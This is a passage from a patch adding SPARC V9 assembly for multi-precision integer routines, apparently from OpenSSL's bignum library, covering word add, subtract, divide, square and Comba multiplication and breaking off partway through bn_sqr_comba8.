+	mulx	%g2,%g2,%o4
+	srlx	%o4,32,%o5
+	stuw	%o4,[%o0+16]
+	inc	16,%o1
+	stuw	%o5,[%o0+20]
+
+	mulx	%g3,%g3,%o4
+	inc	32,%o0
+	stuw	%o4,[%o0-8]
+	srlx	%o4,32,%o5
+	andcc	%o2,-4,%g2
+	stuw	%o5,[%o0-4]
+	bnz,a,pt	%icc,.L_bn_sqr_words_loop
+	lduw	[%o1],%g2
+	nop
+
+	brnz,a,pn	%o2,.L_bn_sqr_words_tail
+	lduw	[%o1],%g2
+.L_bn_sqr_words_return:
+	retl
+	clr	%o0
+
+.L_bn_sqr_words_tail:
+	mulx	%g2,%g2,%o4
+	dec	%o2
+	stuw	%o4,[%o0]
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_sqr_words_return
+	stuw	%o5,[%o0+4]
+
+	lduw	[%o1+4],%g2
+	mulx	%g2,%g2,%o4
+	dec	%o2
+	stuw	%o4,[%o0+8]
+	srlx	%o4,32,%o5
+	brz,pt	%o2,.L_bn_sqr_words_return
+	stuw	%o5,[%o0+12]
+
+	lduw	[%o1+8],%g2
+	mulx	%g2,%g2,%o4
+	srlx	%o4,32,%o5
+	stuw	%o4,[%o0+16]
+	stuw	%o5,[%o0+20]
+	retl
+	clr	%o0
+
+.type	bn_sqr_words,#function
+.size	bn_sqr_words,(.-bn_sqr_words)
+
+.align	32
+.global bn_div_words
+/*
+ * BN_ULONG bn_div_words(h,l,d)
+ * BN_ULONG h,l,d;
+ */
+bn_div_words:
+	sllx	%o0,32,%o0
+	or	%o0,%o1,%o0
+	udivx	%o0,%o2,%o0
+	retl
+	srl	%o0,%g0,%o0	! clruw	%o0
+
+.type	bn_div_words,#function
+.size	bn_div_words,(.-bn_div_words)
+
+.align	32
+
+.global bn_add_words
+/*
+ * BN_ULONG bn_add_words(rp,ap,bp,n)
+ * BN_ULONG *rp,*ap,*bp;
+ * int n;
+ */
+bn_add_words:
+	sra	%o3,%g0,%o3	! signx %o3
+	brgz,a	%o3,.L_bn_add_words_proceed
+	lduw	[%o1],%o4
+	retl
+	clr	%o0
+
+.L_bn_add_words_proceed:
+	andcc	%o3,-4,%g0
+	bz,pn	%icc,.L_bn_add_words_tail
+	addcc	%g0,0,%g0	! clear carry flag
+
+.L_bn_add_words_loop:		! wow! 32 aligned!
+	dec	4,%o3
+	lduw	[%o2],%o5
+	lduw	[%o1+4],%g1
+	lduw	[%o2+4],%g2
+	lduw	[%o1+8],%g3
+	lduw	[%o2+8],%g4
+	addccc	%o5,%o4,%o5
+	stuw	%o5,[%o0]
+
+	lduw	[%o1+12],%o4
+	lduw	[%o2+12],%o5
+	inc	16,%o1
+	addccc	%g1,%g2,%g1
+	stuw	%g1,[%o0+4]
+	
+	inc	16,%o2
+	addccc	%g3,%g4,%g3
+	stuw	%g3,[%o0+8]
+
+	inc	16,%o0
+	addccc	%o5,%o4,%o5
+	stuw	%o5,[%o0-4]
+	and	%o3,-4,%g1
+	brnz,a,pt	%g1,.L_bn_add_words_loop
+	lduw	[%o1],%o4
+
+	brnz,a,pn	%o3,.L_bn_add_words_tail
+	lduw	[%o1],%o4
+.L_bn_add_words_return:
+	clr	%o0
+	retl
+	movcs	%icc,1,%o0
+	nop
+
+.L_bn_add_words_tail:
+	lduw	[%o2],%o5
+	dec	%o3
+	addccc	%o5,%o4,%o5
+	brz,pt	%o3,.L_bn_add_words_return
+	stuw	%o5,[%o0]
+
+	lduw	[%o1+4],%o4
+	lduw	[%o2+4],%o5
+	dec	%o3
+	addccc	%o5,%o4,%o5
+	brz,pt	%o3,.L_bn_add_words_return
+	stuw	%o5,[%o0+4]
+
+	lduw	[%o1+8],%o4
+	lduw	[%o2+8],%o5
+	addccc	%o5,%o4,%o5
+	stuw	%o5,[%o0+8]
+	clr	%o0
+	retl
+	movcs	%icc,1,%o0
+
+.type	bn_add_words,#function
+.size	bn_add_words,(.-bn_add_words)
+
+.global bn_sub_words
+/*
+ * BN_ULONG bn_sub_words(rp,ap,bp,n)
+ * BN_ULONG *rp,*ap,*bp;
+ * int n;
+ */
+bn_sub_words:
+	sra	%o3,%g0,%o3	! signx %o3
+	brgz,a	%o3,.L_bn_sub_words_proceed
+	lduw	[%o1],%o4
+	retl
+	clr	%o0
+
+.L_bn_sub_words_proceed:
+	andcc	%o3,-4,%g0
+	bz,pn	%icc,.L_bn_sub_words_tail
+	addcc	%g0,0,%g0	! clear carry flag
+
+.L_bn_sub_words_loop:		! wow! 32 aligned!
+	dec	4,%o3
+	lduw	[%o2],%o5
+	lduw	[%o1+4],%g1
+	lduw	[%o2+4],%g2
+	lduw	[%o1+8],%g3
+	lduw	[%o2+8],%g4
+	subccc	%o4,%o5,%o5
+	stuw	%o5,[%o0]
+
+	lduw	[%o1+12],%o4
+	lduw	[%o2+12],%o5
+	inc	16,%o1
+	subccc	%g1,%g2,%g2
+	stuw	%g2,[%o0+4]
+
+	inc	16,%o2
+	subccc	%g3,%g4,%g4
+	stuw	%g4,[%o0+8]
+
+	inc	16,%o0
+	subccc	%o4,%o5,%o5
+	stuw	%o5,[%o0-4]
+	and	%o3,-4,%g1
+	brnz,a,pt	%g1,.L_bn_sub_words_loop
+	lduw	[%o1],%o4
+
+	brnz,a,pn	%o3,.L_bn_sub_words_tail
+	lduw	[%o1],%o4
+.L_bn_sub_words_return:
+	clr	%o0
+	retl
+	movcs	%icc,1,%o0
+	nop
+
+.L_bn_sub_words_tail:		! wow! 32 aligned!
+	lduw	[%o2],%o5
+	dec	%o3
+	subccc	%o4,%o5,%o5
+	brz,pt	%o3,.L_bn_sub_words_return
+	stuw	%o5,[%o0]
+
+	lduw	[%o1+4],%o4
+	lduw	[%o2+4],%o5
+	dec	%o3
+	subccc	%o4,%o5,%o5
+	brz,pt	%o3,.L_bn_sub_words_return
+	stuw	%o5,[%o0+4]
+
+	lduw	[%o1+8],%o4
+	lduw	[%o2+8],%o5
+	subccc	%o4,%o5,%o5
+	stuw	%o5,[%o0+8]
+	clr	%o0
+	retl
+	movcs	%icc,1,%o0
+
+.type	bn_sub_words,#function
+.size	bn_sub_words,(.-bn_sub_words)
+
+/*
+ * Code below depends on the fact that upper parts of the %l0-%l7
+ * and %i0-%i7 are zeroed by kernel after context switch. In
+ * previous versions this comment stated that "the trouble is that
+ * it's not feasible to implement the mumbo-jumbo in less V9
+ * instructions:-(" which apparently isn't true thanks to
+ * 'bcs,a %xcc,.+8; inc %rd' pair. But the performance improvement
+ * results not from the shorter code, but from elimination of
+ * multicycle none-pairable 'rd %y,%rd' instructions.
+ *
+ *							Andy.
+ */
+
+/*
+ * Here is register usage map for *all* routines below.
+ */
+#define t_1	%o0
+#define	t_2	%o1
+#define c_12	%o2
+#define c_3	%o3
+
+#define ap(I)	[%i1+4*I]
+#define bp(I)	[%i2+4*I]
+#define rp(I)	[%i0+4*I]
+
+#define	a_0	%l0
+#define	a_1	%l1
+#define	a_2	%l2
+#define	a_3	%l3
+#define	a_4	%l4
+#define	a_5	%l5
+#define	a_6	%l6
+#define	a_7	%l7
+
+#define	b_0	%i3
+#define	b_1	%i4
+#define	b_2	%i5
+#define	b_3	%o4
+#define	b_4	%o5
+#define	b_5	%o7
+#define	b_6	%g1
+#define	b_7	%g4
+
+.align	32
+.global bn_mul_comba8
+/*
+ * void bn_mul_comba8(r,a,b)
+ * BN_ULONG *r,*a,*b;
+ */
+bn_mul_comba8:
+	save	%sp,FRAME_SIZE,%sp
+	mov	1,t_2
+	lduw	ap(0),a_0
+	sllx	t_2,32,t_2
+	lduw	bp(0),b_0	!=
+	lduw	bp(1),b_1
+	mulx	a_0,b_0,t_1	!mul_add_c(a[0],b[0],c1,c2,c3);
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(0)	!=!r[0]=c1;
+
+	lduw	ap(1),a_1
+	mulx	a_0,b_1,t_1	!mul_add_c(a[0],b[1],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3		!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(2),a_2
+	mulx	a_1,b_0,t_1	!=!mul_add_c(a[1],b[0],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(1)	!r[1]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,b_0,t_1	!mul_add_c(a[2],b[0],c3,c1,c2);
+	addcc	c_12,t_1,c_12	!=
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	bp(2),b_2	!=
+	mulx	a_1,b_1,t_1	!mul_add_c(a[1],b[1],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	lduw	bp(3),b_3
+	mulx	a_0,b_2,t_1	!mul_add_c(a[0],b[2],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(2)	!r[2]=c3;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_0,b_3,t_1	!mul_add_c(a[0],b[3],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_1,b_2,t_1	!=!mul_add_c(a[1],b[2],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	lduw	ap(3),a_3
+	mulx	a_2,b_1,t_1	!mul_add_c(a[2],b[1],c1,c2,c3);
+	addcc	c_12,t_1,c_12	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(4),a_4
+	mulx	a_3,b_0,t_1	!=!mul_add_c(a[3],b[0],c1,c2,c3);!=
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(3)	!r[3]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_4,b_0,t_1	!mul_add_c(a[4],b[0],c2,c3,c1);
+	addcc	c_12,t_1,c_12	!=
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,b_1,t_1	!=!mul_add_c(a[3],b[1],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_2,b_2,t_1	!=!mul_add_c(a[2],b[2],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	bp(4),b_4	!=
+	mulx	a_1,b_3,t_1	!mul_add_c(a[1],b[3],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	lduw	bp(5),b_5
+	mulx	a_0,b_4,t_1	!mul_add_c(a[0],b[4],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(4)	!r[4]=c2;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_0,b_5,t_1	!mul_add_c(a[0],b[5],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_1,b_4,t_1	!mul_add_c(a[1],b[4],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_2,b_3,t_1	!mul_add_c(a[2],b[3],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_3,b_2,t_1	!mul_add_c(a[3],b[2],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	lduw	ap(5),a_5
+	mulx	a_4,b_1,t_1	!mul_add_c(a[4],b[1],c3,c1,c2);
+	addcc	c_12,t_1,c_12	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(6),a_6
+	mulx	a_5,b_0,t_1	!=!mul_add_c(a[5],b[0],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(5)	!r[5]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_6,b_0,t_1	!mul_add_c(a[6],b[0],c1,c2,c3);
+	addcc	c_12,t_1,c_12	!=
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_5,b_1,t_1	!=!mul_add_c(a[5],b[1],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_4,b_2,t_1	!=!mul_add_c(a[4],b[2],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,b_3,t_1	!=!mul_add_c(a[3],b[3],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_2,b_4,t_1	!=!mul_add_c(a[2],b[4],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	bp(6),b_6	!=
+	mulx	a_1,b_5,t_1	!mul_add_c(a[1],b[5],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	lduw	bp(7),b_7
+	mulx	a_0,b_6,t_1	!mul_add_c(a[0],b[6],c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(6)	!r[6]=c1;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_0,b_7,t_1	!mul_add_c(a[0],b[7],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_1,b_6,t_1	!mul_add_c(a[1],b[6],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_2,b_5,t_1	!mul_add_c(a[2],b[5],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_3,b_4,t_1	!mul_add_c(a[3],b[4],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_4,b_3,t_1	!mul_add_c(a[4],b[3],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_5,b_2,t_1	!mul_add_c(a[5],b[2],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	lduw	ap(7),a_7
+	mulx	a_6,b_1,t_1	!=!mul_add_c(a[6],b[1],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_7,b_0,t_1	!=!mul_add_c(a[7],b[0],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(7)	!r[7]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_7,b_1,t_1	!=!mul_add_c(a[7],b[1],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_6,b_2,t_1	!mul_add_c(a[6],b[2],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_5,b_3,t_1	!mul_add_c(a[5],b[3],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_4,b_4,t_1	!mul_add_c(a[4],b[4],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_3,b_5,t_1	!mul_add_c(a[3],b[5],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_2,b_6,t_1	!mul_add_c(a[2],b[6],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_1,b_7,t_1	!mul_add_c(a[1],b[7],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(8)	!r[8]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,b_7,t_1	!=!mul_add_c(a[2],b[7],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	mulx	a_3,b_6,t_1	!mul_add_c(a[3],b[6],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_4,b_5,t_1	!mul_add_c(a[4],b[5],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_5,b_4,t_1	!mul_add_c(a[5],b[4],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_6,b_3,t_1	!mul_add_c(a[6],b[3],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_7,b_2,t_1	!mul_add_c(a[7],b[2],c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(9)	!r[9]=c1;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_7,b_3,t_1	!mul_add_c(a[7],b[3],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_6,b_4,t_1	!mul_add_c(a[6],b[4],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_5,b_5,t_1	!mul_add_c(a[5],b[5],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_4,b_6,t_1	!mul_add_c(a[4],b[6],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_3,b_7,t_1	!mul_add_c(a[3],b[7],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(10)	!r[10]=c2;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_4,b_7,t_1	!mul_add_c(a[4],b[7],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_5,b_6,t_1	!mul_add_c(a[5],b[6],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_6,b_5,t_1	!mul_add_c(a[6],b[5],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_7,b_4,t_1	!mul_add_c(a[7],b[4],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(11)	!r[11]=c3;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_7,b_5,t_1	!mul_add_c(a[7],b[5],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_6,b_6,t_1	!mul_add_c(a[6],b[6],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_5,b_7,t_1	!mul_add_c(a[5],b[7],c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(12)	!r[12]=c1;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_6,b_7,t_1	!mul_add_c(a[6],b[7],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_7,b_6,t_1	!mul_add_c(a[7],b[6],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	st	t_1,rp(13)	!r[13]=c2;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_7,b_7,t_1	!mul_add_c(a[7],b[7],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(14)	!r[14]=c3;
+	stuw	c_12,rp(15)	!r[15]=c1;
+
+	ret
+	restore	%g0,%g0,%o0	!=
+
+.type	bn_mul_comba8,#function
+.size	bn_mul_comba8,(.-bn_mul_comba8)
+
+.align	32
+
+.global bn_mul_comba4
+/*
+ * void bn_mul_comba4(r,a,b)
+ * BN_ULONG *r,*a,*b;
+ */
+bn_mul_comba4:
+	save	%sp,FRAME_SIZE,%sp
+	lduw	ap(0),a_0
+	mov	1,t_2
+	lduw	bp(0),b_0
+	sllx	t_2,32,t_2	!=
+	lduw	bp(1),b_1
+	mulx	a_0,b_0,t_1	!mul_add_c(a[0],b[0],c1,c2,c3);
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(0)	!=!r[0]=c1;
+
+	lduw	ap(1),a_1
+	mulx	a_0,b_1,t_1	!mul_add_c(a[0],b[1],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3		!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(2),a_2
+	mulx	a_1,b_0,t_1	!=!mul_add_c(a[1],b[0],c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(1)	!r[1]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,b_0,t_1	!mul_add_c(a[2],b[0],c3,c1,c2);
+	addcc	c_12,t_1,c_12	!=
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	bp(2),b_2	!=
+	mulx	a_1,b_1,t_1	!mul_add_c(a[1],b[1],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3	!=
+	lduw	bp(3),b_3
+	mulx	a_0,b_2,t_1	!mul_add_c(a[0],b[2],c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(2)	!r[2]=c3;
+	or	c_12,c_3,c_12	!=
+
+	mulx	a_0,b_3,t_1	!mul_add_c(a[0],b[3],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	mulx	a_1,b_2,t_1	!mul_add_c(a[1],b[2],c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8	!=
+	add	c_3,t_2,c_3
+	lduw	ap(3),a_3
+	mulx	a_2,b_1,t_1	!mul_add_c(a[2],b[1],c1,c2,c3);
+	addcc	c_12,t_1,c_12	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,b_0,t_1	!mul_add_c(a[3],b[0],c1,c2,c3);!=
+	addcc	c_12,t_1,t_1	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(3)	!=!r[3]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_3,b_1,t_1	!mul_add_c(a[3],b[1],c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3		!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_2,b_2,t_1	!mul_add_c(a[2],b[2],c2,c3,c1);
+	addcc	c_12,t_1,c_12	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_1,b_3,t_1	!mul_add_c(a[1],b[3],c2,c3,c1);
+	addcc	c_12,t_1,t_1	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(4)	!=!r[4]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,b_3,t_1	!mul_add_c(a[2],b[3],c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3		!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,b_2,t_1	!mul_add_c(a[3],b[2],c3,c1,c2);
+	addcc	c_12,t_1,t_1	!=
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(5)	!=!r[5]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_3,b_3,t_1	!mul_add_c(a[3],b[3],c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	srlx	t_1,32,c_12	!=
+	stuw	t_1,rp(6)	!r[6]=c1;
+	stuw	c_12,rp(7)	!r[7]=c2;
+	
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_mul_comba4,#function
+.size	bn_mul_comba4,(.-bn_mul_comba4)
+
+.align	32
+
+.global bn_sqr_comba8
+bn_sqr_comba8:
+	save	%sp,FRAME_SIZE,%sp
+	mov	1,t_2
+	lduw	ap(0),a_0
+	sllx	t_2,32,t_2
+	lduw	ap(1),a_1
+	mulx	a_0,a_0,t_1	!sqr_add_c(a,0,c1,c2,c3);
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(0)	!r[0]=c1;
+
+	lduw	ap(2),a_2
+	mulx	a_0,a_1,t_1	!=!sqr_add_c2(a,1,0,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(1)	!r[1]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,a_0,t_1	!sqr_add_c2(a,2,0,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(3),a_3
+	mulx	a_1,a_1,t_1	!sqr_add_c(a,1,c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(2)	!r[2]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_0,a_3,t_1	!sqr_add_c2(a,3,0,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(4),a_4
+	mulx	a_1,a_2,t_1	!sqr_add_c2(a,2,1,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	st	t_1,rp(3)	!r[3]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_4,a_0,t_1	!sqr_add_c2(a,4,0,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,a_1,t_1	!sqr_add_c2(a,3,1,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
